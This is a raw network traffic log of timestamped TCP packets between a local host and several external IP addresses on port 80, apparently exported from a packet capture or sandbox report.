Oct 26, 2022 13:14:20.192377090 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.192384005 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.192433119 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.192435026 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.192486048 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.192517042 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.192538977 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.192590952 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.192600965 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.192601919 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.192643881 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.192694902 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.192697048 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.192743063 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.192749023 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.192795992 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.192800999 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.192852974 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.192858934 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.192859888 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.192907095 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.192959070 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.192986965 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.193010092 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.193039894 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.193063021 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.193090916 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.193114996 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.193145037 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.193166971 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.193218946 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.193218946 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.193218946 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.193272114 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.193326950 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.193326950 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.193361044 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.193423033 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.193439960 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.193495035 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.193505049 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.193550110 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.193588018 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.193602085 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.193636894 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.193655968 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.193686962 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.193711042 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.193741083 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.193763018 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.193794012 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.193814993 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.193847895 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.193869114 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.193921089 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.193922043 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.193922043 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.193973064 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.194017887 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.194025040 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.194066048 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.194077969 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.194116116 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.194130898 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.194165945 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.194184065 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.194214106 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.194236040 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.194272041 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.194288969 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.194320917 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.194340944 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.194370985 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.194394112 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.194433928 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.194446087 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.194480896 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.194499016 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.194533110 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.194576025 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.194580078 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.194629908 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.194658995 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.194683075 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.194736004 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.194739103 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.194787025 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.194787979 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.194837093 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.194840908 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.194885969 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.194895029 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.194933891 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.194974899 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.194999933 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.195048094 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.195056915 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.195116043 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.195126057 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.195169926 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.195208073 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.195219040 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:20.195255041 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:20.195360899 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:25.045397997 CEST	80	49834	202.5.16.67	192.168.11.20
Oct 26, 2022 13:14:25.045583010 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:14:39.381556034 CEST	49834	80	192.168.11.20	202.5.16.67
Oct 26, 2022 13:15:28.163836002 CEST	49840	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:15:28.189548969 CEST	80	49840	2.57.90.16	192.168.11.20
Oct 26, 2022 13:15:28.189697981 CEST	49840	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:15:28.189862967 CEST	49840	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:15:28.215266943 CEST	80	49840	2.57.90.16	192.168.11.20
Oct 26, 2022 13:15:28.215370893 CEST	80	49840	2.57.90.16	192.168.11.20
Oct 26, 2022 13:15:28.215380907 CEST	80	49840	2.57.90.16	192.168.11.20
Oct 26, 2022 13:15:28.215693951 CEST	49840	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:15:28.215790987 CEST	49840	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:15:28.241662025 CEST	80	49840	2.57.90.16	192.168.11.20
Oct 26, 2022 13:15:38.322561979 CEST	49846	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:15:38.351341009 CEST	80	49846	2.57.90.16	192.168.11.20
Oct 26, 2022 13:15:38.351615906 CEST	49846	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:15:38.351721048 CEST	49846	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:15:38.380575895 CEST	80	49846	2.57.90.16	192.168.11.20
Oct 26, 2022 13:15:38.381550074 CEST	80	49846	2.57.90.16	192.168.11.20
Oct 26, 2022 13:15:38.381659985 CEST	80	49846	2.57.90.16	192.168.11.20
Oct 26, 2022 13:15:38.381822109 CEST	49846	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:15:39.366992950 CEST	49846	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:15:40.382813931 CEST	49847	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:15:40.409084082 CEST	80	49847	2.57.90.16	192.168.11.20
Oct 26, 2022 13:15:40.409363031 CEST	49847	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:15:40.409604073 CEST	49847	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:15:40.435333967 CEST	80	49847	2.57.90.16	192.168.11.20
Oct 26, 2022 13:15:40.435426950 CEST	80	49847	2.57.90.16	192.168.11.20
Oct 26, 2022 13:15:40.435442924 CEST	80	49847	2.57.90.16	192.168.11.20
Oct 26, 2022 13:15:40.435637951 CEST	49847	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:15:41.413486958 CEST	49847	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:15:42.429090023 CEST	49848	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:15:42.458235025 CEST	80	49848	2.57.90.16	192.168.11.20
Oct 26, 2022 13:15:42.458455086 CEST	49848	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:15:42.458986044 CEST	49848	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:15:42.459036112 CEST	49848	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:15:42.459086895 CEST	49848	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:15:42.487910032 CEST	80	49848	2.57.90.16	192.168.11.20
Oct 26, 2022 13:15:42.487982988 CEST	80	49848	2.57.90.16	192.168.11.20
Oct 26, 2022 13:15:42.488099098 CEST	80	49848	2.57.90.16	192.168.11.20
Oct 26, 2022 13:15:42.488162994 CEST	49848	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:15:42.488255024 CEST	80	49848	2.57.90.16	192.168.11.20
Oct 26, 2022 13:15:42.488423109 CEST	80	49848	2.57.90.16	192.168.11.20
Oct 26, 2022 13:15:42.488440037 CEST	49848	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:15:42.488607883 CEST	80	49848	2.57.90.16	192.168.11.20
Oct 26, 2022 13:15:42.488609076 CEST	49848	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:15:42.488656044 CEST	49848	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:15:42.488826990 CEST	49848	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:15:42.488997936 CEST	49848	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:15:42.517019033 CEST	80	49848	2.57.90.16	192.168.11.20
Oct 26, 2022 13:15:42.517168999 CEST	49848	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:15:42.517211914 CEST	80	49848	2.57.90.16	192.168.11.20
Oct 26, 2022 13:15:42.517219067 CEST	49848	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:15:42.517357111 CEST	80	49848	2.57.90.16	192.168.11.20
Oct 26, 2022 13:15:42.517437935 CEST	49848	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:15:42.517529011 CEST	80	49848	2.57.90.16	192.168.11.20
Oct 26, 2022 13:15:42.517610073 CEST	49848	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:15:42.517698050 CEST	80	49848	2.57.90.16	192.168.11.20
Oct 26, 2022 13:15:42.517714024 CEST	80	49848	2.57.90.16	192.168.11.20
Oct 26, 2022 13:15:42.517878056 CEST	49848	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:15:42.517951965 CEST	80	49848	2.57.90.16	192.168.11.20
Oct 26, 2022 13:15:42.546152115 CEST	80	49848	2.57.90.16	192.168.11.20
Oct 26, 2022 13:15:42.546273947 CEST	80	49848	2.57.90.16	192.168.11.20
Oct 26, 2022 13:15:42.546369076 CEST	80	49848	2.57.90.16	192.168.11.20
Oct 26, 2022 13:15:42.546614885 CEST	80	49848	2.57.90.16	192.168.11.20
Oct 26, 2022 13:15:42.546706915 CEST	80	49848	2.57.90.16	192.168.11.20
Oct 26, 2022 13:15:42.546855927 CEST	80	49848	2.57.90.16	192.168.11.20
Oct 26, 2022 13:15:42.546931028 CEST	80	49848	2.57.90.16	192.168.11.20
Oct 26, 2022 13:15:42.547132969 CEST	49848	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:15:43.459925890 CEST	49848	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:15:44.475636959 CEST	49849	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:15:44.501408100 CEST	80	49849	2.57.90.16	192.168.11.20
Oct 26, 2022 13:15:44.501609087 CEST	49849	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:15:44.501684904 CEST	49849	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:15:44.527375937 CEST	80	49849	2.57.90.16	192.168.11.20
Oct 26, 2022 13:15:44.527436018 CEST	80	49849	2.57.90.16	192.168.11.20
Oct 26, 2022 13:15:44.527481079 CEST	80	49849	2.57.90.16	192.168.11.20
Oct 26, 2022 13:15:44.527810097 CEST	49849	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:15:44.527872086 CEST	49849	80	192.168.11.20	2.57.90.16
Oct 26, 2022 13:15:44.553617954 CEST	80	49849	2.57.90.16	192.168.11.20
Oct 26, 2022 13:15:49.961698055 CEST	49850	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:15:50.153786898 CEST	80	49850	162.214.80.106	192.168.11.20
Oct 26, 2022 13:15:50.154113054 CEST	49850	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:15:50.154114008 CEST	49850	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:15:50.346137047 CEST	80	49850	162.214.80.106	192.168.11.20
Oct 26, 2022 13:15:50.350687981 CEST	80	49850	162.214.80.106	192.168.11.20
Oct 26, 2022 13:15:50.350771904 CEST	80	49850	162.214.80.106	192.168.11.20
Oct 26, 2022 13:15:50.350985050 CEST	49850	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:15:51.161427021 CEST	49850	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:15:52.176902056 CEST	49851	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:15:52.371849060 CEST	80	49851	162.214.80.106	192.168.11.20
Oct 26, 2022 13:15:52.372077942 CEST	49851	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:15:52.372186899 CEST	49851	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:15:52.567483902 CEST	80	49851	162.214.80.106	192.168.11.20
Oct 26, 2022 13:15:52.571872950 CEST	80	49851	162.214.80.106	192.168.11.20
Oct 26, 2022 13:15:52.571958065 CEST	80	49851	162.214.80.106	192.168.11.20
Oct 26, 2022 13:15:52.572606087 CEST	49851	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:15:53.379630089 CEST	49851	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:15:54.395493031 CEST	49852	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:15:54.588272095 CEST	80	49852	162.214.80.106	192.168.11.20
Oct 26, 2022 13:15:54.588493109 CEST	49852	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:15:54.589155912 CEST	49852	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:15:54.782258034 CEST	80	49852	162.214.80.106	192.168.11.20
Oct 26, 2022 13:15:54.782286882 CEST	80	49852	162.214.80.106	192.168.11.20
Oct 26, 2022 13:15:54.782306910 CEST	80	49852	162.214.80.106	192.168.11.20
Oct 26, 2022 13:15:54.782351017 CEST	80	49852	162.214.80.106	192.168.11.20
Oct 26, 2022 13:15:54.782411098 CEST	80	49852	162.214.80.106	192.168.11.20
Oct 26, 2022 13:15:54.782470942 CEST	49852	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:15:54.782668114 CEST	49852	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:15:54.782807112 CEST	49852	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:15:54.974745989 CEST	80	49852	162.214.80.106	192.168.11.20
Oct 26, 2022 13:15:54.974781036 CEST	80	49852	162.214.80.106	192.168.11.20
Oct 26, 2022 13:15:54.974912882 CEST	80	49852	162.214.80.106	192.168.11.20
Oct 26, 2022 13:15:54.974924088 CEST	49852	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:15:54.974925995 CEST	80	49852	162.214.80.106	192.168.11.20
Oct 26, 2022 13:15:54.974996090 CEST	80	49852	162.214.80.106	192.168.11.20
Oct 26, 2022 13:15:54.975095034 CEST	49852	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:15:54.975135088 CEST	80	49852	162.214.80.106	192.168.11.20
Oct 26, 2022 13:15:54.975150108 CEST	80	49852	162.214.80.106	192.168.11.20
Oct 26, 2022 13:15:54.975265026 CEST	49852	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:15:54.975399017 CEST	80	49852	162.214.80.106	192.168.11.20
Oct 26, 2022 13:15:54.975428104 CEST	49852	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:15:54.975476980 CEST	80	49852	162.214.80.106	192.168.11.20
Oct 26, 2022 13:15:54.975619078 CEST	80	49852	162.214.80.106	192.168.11.20
Oct 26, 2022 13:15:54.975917101 CEST	80	49852	162.214.80.106	192.168.11.20
Oct 26, 2022 13:15:55.016138077 CEST	80	49852	162.214.80.106	192.168.11.20
Oct 26, 2022 13:15:55.167169094 CEST	80	49852	162.214.80.106	192.168.11.20
Oct 26, 2022 13:15:55.167221069 CEST	80	49852	162.214.80.106	192.168.11.20
Oct 26, 2022 13:15:55.167448997 CEST	80	49852	162.214.80.106	192.168.11.20
Oct 26, 2022 13:15:55.167496920 CEST	80	49852	162.214.80.106	192.168.11.20
Oct 26, 2022 13:15:55.167726994 CEST	80	49852	162.214.80.106	192.168.11.20
Oct 26, 2022 13:15:55.167781115 CEST	80	49852	162.214.80.106	192.168.11.20
Oct 26, 2022 13:15:55.167994022 CEST	49852	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:15:55.597894907 CEST	49852	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:15:56.615437984 CEST	49853	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:15:56.809075117 CEST	80	49853	162.214.80.106	192.168.11.20
Oct 26, 2022 13:15:56.809300900 CEST	49853	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:15:56.809410095 CEST	49853	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:15:57.003082037 CEST	80	49853	162.214.80.106	192.168.11.20
Oct 26, 2022 13:15:57.018763065 CEST	80	49853	162.214.80.106	192.168.11.20
Oct 26, 2022 13:15:57.066201925 CEST	49853	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:16:07.028670073 CEST	80	49853	162.214.80.106	192.168.11.20
Oct 26, 2022 13:16:07.029062986 CEST	49853	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:16:07.029063940 CEST	49853	80	192.168.11.20	162.214.80.106
Oct 26, 2022 13:16:07.223228931 CEST	80	49853	162.214.80.106	192.168.11.20
Oct 26, 2022 13:16:12.064280033 CEST	49854	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:16:12.221148968 CEST	80	49854	162.0.238.95	192.168.11.20
Oct 26, 2022 13:16:12.221420050 CEST	49854	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:16:12.221575975 CEST	49854	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:16:12.378222942 CEST	80	49854	162.0.238.95	192.168.11.20
Oct 26, 2022 13:16:12.480918884 CEST	80	49854	162.0.238.95	192.168.11.20
Oct 26, 2022 13:16:12.480995893 CEST	80	49854	162.0.238.95	192.168.11.20
Oct 26, 2022 13:16:12.481266975 CEST	49854	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:16:13.234575987 CEST	49854	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:16:14.250207901 CEST	49855	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:16:14.406749964 CEST	80	49855	162.0.238.95	192.168.11.20
Oct 26, 2022 13:16:14.406961918 CEST	49855	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:16:14.407136917 CEST	49855	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:16:14.563527107 CEST	80	49855	162.0.238.95	192.168.11.20
Oct 26, 2022 13:16:14.671529055 CEST	80	49855	162.0.238.95	192.168.11.20
Oct 26, 2022 13:16:14.671592951 CEST	80	49855	162.0.238.95	192.168.11.20
Oct 26, 2022 13:16:14.671783924 CEST	49855	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:16:15.421812057 CEST	49855	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:16:16.437155008 CEST	49856	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:16:16.594166994 CEST	80	49856	162.0.238.95	192.168.11.20
Oct 26, 2022 13:16:16.594371080 CEST	49856	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:16:16.594966888 CEST	49856	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:16:16.595016956 CEST	49856	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:16:16.595067024 CEST	49856	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:16:16.751532078 CEST	80	49856	162.0.238.95	192.168.11.20
Oct 26, 2022 13:16:16.751646996 CEST	80	49856	162.0.238.95	192.168.11.20
Oct 26, 2022 13:16:16.751739979 CEST	80	49856	162.0.238.95	192.168.11.20
Oct 26, 2022 13:16:16.751773119 CEST	49856	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:16:16.751841068 CEST	80	49856	162.0.238.95	192.168.11.20
Oct 26, 2022 13:16:16.751857996 CEST	49856	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:16:16.751972914 CEST	80	49856	162.0.238.95	192.168.11.20
Oct 26, 2022 13:16:16.752024889 CEST	49856	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:16:16.752109051 CEST	80	49856	162.0.238.95	192.168.11.20
Oct 26, 2022 13:16:16.752204895 CEST	49856	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:16:16.752228975 CEST	80	49856	162.0.238.95	192.168.11.20
Oct 26, 2022 13:16:16.752362013 CEST	49856	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:16:16.752396107 CEST	80	49856	162.0.238.95	192.168.11.20
Oct 26, 2022 13:16:16.752537012 CEST	49856	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:16:16.752701998 CEST	49856	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:16:16.909238100 CEST	80	49856	162.0.238.95	192.168.11.20
Oct 26, 2022 13:16:16.909406900 CEST	80	49856	162.0.238.95	192.168.11.20
Oct 26, 2022 13:16:16.909425020 CEST	49856	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:16:16.909490108 CEST	49856	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:16:16.909516096 CEST	80	49856	162.0.238.95	192.168.11.20
Oct 26, 2022 13:16:16.909722090 CEST	49856	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:16:16.909761906 CEST	80	49856	162.0.238.95	192.168.11.20
Oct 26, 2022 13:16:16.909898043 CEST	49856	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:16:16.910063982 CEST	49856	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:16:16.910229921 CEST	49856	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:16:16.910258055 CEST	80	49856	162.0.238.95	192.168.11.20
Oct 26, 2022 13:16:16.910356998 CEST	80	49856	162.0.238.95	192.168.11.20
Oct 26, 2022 13:16:16.910429955 CEST	80	49856	162.0.238.95	192.168.11.20
Oct 26, 2022 13:16:16.910479069 CEST	80	49856	162.0.238.95	192.168.11.20
Oct 26, 2022 13:16:16.910521984 CEST	80	49856	162.0.238.95	192.168.11.20
Oct 26, 2022 13:16:16.910747051 CEST	80	49856	162.0.238.95	192.168.11.20
Oct 26, 2022 13:16:17.065829992 CEST	80	49856	162.0.238.95	192.168.11.20
Oct 26, 2022 13:16:17.066052914 CEST	80	49856	162.0.238.95	192.168.11.20
Oct 26, 2022 13:16:17.066719055 CEST	80	49856	162.0.238.95	192.168.11.20
Oct 26, 2022 13:16:17.066791058 CEST	80	49856	162.0.238.95	192.168.11.20
Oct 26, 2022 13:16:17.067281961 CEST	80	49856	162.0.238.95	192.168.11.20
Oct 26, 2022 13:16:17.507975101 CEST	80	49856	162.0.238.95	192.168.11.20
Oct 26, 2022 13:16:17.508117914 CEST	49856	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:16:17.608623028 CEST	49856	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:16:17.765034914 CEST	80	49856	162.0.238.95	192.168.11.20
Oct 26, 2022 13:16:17.988826990 CEST	80	49856	162.0.238.95	192.168.11.20
Oct 26, 2022 13:16:17.989145041 CEST	49856	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:16:18.624248028 CEST	49857	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:16:18.780880928 CEST	80	49857	162.0.238.95	192.168.11.20
Oct 26, 2022 13:16:18.781111956 CEST	49857	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:16:18.781186104 CEST	49857	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:16:18.937880993 CEST	80	49857	162.0.238.95	192.168.11.20
Oct 26, 2022 13:16:19.032238960 CEST	80	49857	162.0.238.95	192.168.11.20
Oct 26, 2022 13:16:19.032288074 CEST	80	49857	162.0.238.95	192.168.11.20
Oct 26, 2022 13:16:19.032669067 CEST	49857	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:16:19.032852888 CEST	49857	80	192.168.11.20	162.0.238.95
Oct 26, 2022 13:16:19.189522028 CEST	80	49857	162.0.238.95	192.168.11.20
Oct 26, 2022 13:16:24.432703972 CEST	49858	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:16:24.590132952 CEST	80	49858	162.241.217.234	192.168.11.20
Oct 26, 2022 13:16:24.590476036 CEST	49858	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:16:24.590591908 CEST	49858	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:16:24.743778944 CEST	80	49858	162.241.217.234	192.168.11.20
Oct 26, 2022 13:16:24.753683090 CEST	80	49858	162.241.217.234	192.168.11.20
Oct 26, 2022 13:16:24.753779888 CEST	80	49858	162.241.217.234	192.168.11.20
Oct 26, 2022 13:16:24.753947020 CEST	49858	80	192.168.11.20	162.241.217.234
